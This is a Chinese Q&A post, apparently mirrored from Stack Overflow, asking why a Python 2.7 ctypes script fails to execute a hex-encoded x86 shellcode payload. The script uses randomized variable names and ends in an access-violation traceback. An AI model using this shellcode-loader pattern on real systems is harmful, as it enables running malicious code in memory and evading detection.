无法使用python ctypes执行有效负载

时间:2019-07-23 14:44:03

标签: python windows python-2.7 ctypes python-2.x

我无法使用python2.7 ctypes执行有效载荷

我尝试将ctypes.CFUNCTYPE更改为ctypes.WINFUNCTYPE 但回溯还是一样

import ctypes

# Our code goes here
rHfGjdSiJdK = ("\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x53\xff\xd5");


# Push into memory
dEiTgKJDe = ctypes.create_string_buffer(rHfGjdSiJdK, len(rHfGjdSiJdK))
iKaiRSdDk = ctypes.cast(dEiTgKJDe, ctypes.CFUNCTYPE(ctypes.c_void_p))
iKaiRSdDk()

Traceback (most recent call last):
  File "shellcode.py", line 19, in <module>
    iKaiRSdDk()
WindowsError: exception: access violation writing 0x02FA9CE8

它应该执行。

0 个答案:

没有答案